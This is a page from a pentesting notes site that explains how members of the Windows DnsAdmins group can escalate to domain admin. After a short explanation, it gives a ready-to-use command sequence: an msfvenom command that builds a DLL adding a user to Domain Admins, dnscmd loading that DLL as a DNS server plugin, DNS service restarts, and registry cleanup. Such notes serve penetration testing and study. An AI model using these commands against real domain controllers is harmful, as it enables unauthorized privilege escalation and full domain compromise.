RIO
  • Welcome
    • RIO
    • Useful Links
  • PENTESTING
    • Methodology
    • Protocols
      • FTP
      • SMB
      • NFS
      • SSH
      • RDP
      • SMTP
      • IMAP / POP3
      • RSYNC
      • SNMP
      • IPMI
      • R-Services
      • WinRM
      • WMI
      • LDAP
    • Databases
      • MySQL
      • MSSQL
      • Oracle TNS
      • PostgreSQL
    • File Transfers
      • Windows
      • Linux
      • Code
      • Misc
    • Password Attacks
      • John The Ripper
      • Hashcat
    • Docker
  • TOOLS
    • Nmap
    • Metasploit
    • BloodHound
    • Other
  • Linux
    • Theory
    • Commands and Utilities
      • Useful Commands
    • Bash Scripting
    • Post-Exploitation
      • Cred Hunting
      • Pivoting
    • Privilege Escalation
  • WINDOWS
    • Theory
      • Security
    • Commands and Utilities
    • PowerShell
    • Post-Exploitation
      • Tools
      • Enumeration
        • System
        • Network
        • Users
        • Groups
        • Processes / Services
        • Permissions
        • Defence
        • Programs
        • Files
      • Access
      • Pivoting
      • Cred Hunting
    • Privilege Escalation
      • Privileges
      • Built-In Groups
        • Backup Operators
        • Server Operators
        • Print Operators
        • DnsAdmins
        • Event Log Readers
      • Privilege Abuse
        • Potatoes
        • SeDebugPrivilege
        • SeTakeOwnershipPrivilege
      • MISC
        • UAC Bypass
        • User-Interaction Attacks
        • Weak Permissions
  • ACTIVE DIRECTORY
    • Theory
      • Terminology
    • Reconnaissance
      • Responder
      • Password Policies
      • DNS
      • Enumeration
        • Users
        • Groups
          • GPO's
        • Shares
        • Domain
        • Trusts
        • ACL
    • Movement
      • Credentials
        • Dumping
          • DCSync
        • Making a Target List
        • Spraying
        • Powershell Remoting
      • Kerberos
        • Kerbrute
        • Kerberoasting
          • Semi-Manual Way
          • Targeted Kerberoasting
        • ASREProasting
        • Forging
          • Golden Ticket
        • Overpass The Hash
        • Pass The Ticket
        • noPAC
      • MITM / Coerced Auths
        • LLMNR, NBT-NS Poisoning
        • PetitPotam
      • DACL Abuse
        • AddMember
        • ForceChangePassword
      • Trust Abuse
        • ExtraSIDs
      • ADCS
      • Printers
        • PrintNightmare
    • Tools
  • Networking
    • Theory
      • Types / Topologies
      • OSI & TCP/IP Models
      • TCP / UDP
      • MAC Addresses
      • IP / Subnetting
      • Proxies
      • ARP
    • Pivoting
      • Port-Forwarding
    • Commands and Utilities
    • Techniques
  • WEB
    • Web Recon
      • Fuzzing
    • DNS
  • CLOUD
    • Google GKE/GCP
      • Theory
Powered by GitBook
On this page
  • ABOUT
  • Importing custom plugin
  • Cleanup
  1. WINDOWS
  2. Privilege Escalation
  3. Built-In Groups

DnsAdmins

ABOUT

Members of the DnsAdmins group can access DNS information within the network. The Windows DNS service allows custom plugins, which can execute functions to resolve name queries beyond the locally hosted DNS zones. Since the DNS service operates with NT AUTHORITY\SYSTEM privileges, being part of this group could be exploited to escalate privileges on a Domain Controller or a dedicated DNS server for the domain. The built-in dnscmd utility can be used to define the path of the plugin DLL.

Importing custom plugin

Generating malicious dll

msfvenom -p windows/x64/exec cmd='net group "domain admins" ven17 /add /domain' -f dll -o adduser.dll

Starting local HTTP server

python3 -m http.server 1337

Loading DLL

You should be DnsAdmins group member!

C:\> dnscmd.exe /config /serverlevelplugindll C:\Users\ven17\Desktop\adduser.dll

  • If successful: Registry property serverlevelplugindll successfully reset.

Restart DNS Service

C:\> sc.exe stop dns
C:\> sc.exe start dns

Confirm Admin Privileges

PS C:\> net group "Domain Admins" /dom

Cleanup

Confirming Registry Key Added

C:\> reg query \\13.13.13.13\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

Delete Registry Key

C:\> reg delete \\13.13.13.13\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll

Restart DNS Service

C:\> sc.exe start dns
C:\> sc query dns
PreviousPrint OperatorsNextEvent Log Readers